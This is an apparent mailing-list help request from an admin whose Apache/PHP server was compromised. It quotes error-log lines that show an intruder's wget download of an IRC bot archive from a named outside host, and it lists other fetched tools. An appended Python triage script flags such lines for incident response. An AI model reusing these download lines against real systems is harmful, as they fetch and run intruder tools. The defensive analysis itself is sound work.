Message-ID: <445E360D.40803@f-s.at>
Date: Sun May  7 19:01:55 2006
From: php-sec at f-s.at (Fabio Saber)
Subject: Apache Security Problem - need help

Hello list,

I am facing a fairly serious problem here. An attack was carried out on my 
system (Debian) via (I suspect) Apache (Apache/1.3.33).
I assume that session data was somehow manipulated and that files were 
downloaded as a result.

An excerpt from the Apache error.log shows the following:

Hello list,

I've some troubles with Apache (1.3.33) on a Debian system. I suppose 
that someone manipulated active sessions (PHP) and got access to my system.
A short extract from my apache error.log

-------------------
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
sh: line 1: cd: .sess_f345236263adsdadas2737237723: No such file or directory
--19:32:36--  http://mrx88.altervista.org/iroffer.tar
          => `iroffer.tar'
Resolving mrx88.altervista.org... done.
Connecting to mrx88.altervista.org[67.15.189.15]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 126,773 [application/x-tar]

   0K .......... .......... .......... .......... .......... 40%   66.14 KB/s
  50K .......... .......... .......... .......... .......... 80%  146.63 KB/s
 100K .......... .......... ...                             100%  208.79 KB/s

19:32:38 (102.23 KB/s) - `iroffer.tar' saved [126773/126773]

error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
sh: line 1: cd: .sess_f345236263adsdadas2737237723: No such file or directory
-------------------

I can't understand why these lines are in the error.log?
Also some other files have been loaded: 
http://mrx88.altervista.org/xhide.c   and 
http://ninobuccheri86.altervista.org/zxcv.

The downloaded program has also been compiled and started.

Thanks for help!
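
An added triage example, not part of the original message: anything a process started by the web server writes to stderr ends up in Apache's error log without the usual `[timestamp] [level]` prefix, so shell and wget output there points to commands run under the web server account. The Python below flags such lines; the sample log is constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlparse

# Genuine Apache error_log entries start with a bracketed timestamp and level.
APACHE_ENTRY = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
# Classic wget transcript header: --HH:MM:SS--  URL
WGET_START = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
WGET_SAVED = re.compile(r"- `([^']+)' saved \[(\d+)/\d+\]")
SHELL_ERR = re.compile(r"^(?:sh|bash): line \d+: (.+)")

def triage(lines):
    """Return (line_no, kind, detail) for every line that is not an Apache entry."""
    findings = []
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line.strip() or APACHE_ENTRY.match(line):
            continue
        if m := WGET_START.match(line):
            findings.append((no, "download-start", m.group(1)))
        elif m := WGET_SAVED.search(line):
            findings.append((no, "download-saved", f"{m.group(1)} ({m.group(2)} bytes)"))
        elif m := SHELL_ERR.match(line):
            findings.append((no, "shell-error", m.group(1)))
        else:
            findings.append((no, "stray-output", line.strip()))
    return findings

def download_hosts(findings):
    """Hosts contacted by downloads, for firewall and proxy log correlation."""
    return sorted({urlparse(d).hostname for _, kind, d in findings if kind == "download-start"})

# Constructed sample modelled on the extract above (host and file names are placeholders).
SAMPLE = """\
[Sun May  7 19:32:30 2006] [error] [client 192.0.2.10] File does not exist: /var/www/favicon.ico
error: 'kern.ostype' is an unknown key
sh: line 1: cd: .sess_0000example: No such file or directory
--19:32:36--  http://files.example.org/tool.tar
           => `tool.tar'
Resolving files.example.org... done.
HTTP request sent, awaiting response... 200 OK
19:32:38 (102.23 KB/s) - `tool.tar' saved [126773/126773]
[Sun May  7 19:33:01 2006] [notice] caught SIGTERM, shutting down
""".splitlines()

if __name__ == "__main__":
    for no, kind, detail in triage(SAMPLE):
        print(f"{no:>4}  {kind:<15} {detail}")
    print("hosts:", download_hosts(triage(SAMPLE)))
```

The timestamps of the Apache entries surrounding each flagged block give the window to search in the access log for the request that triggered the command.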
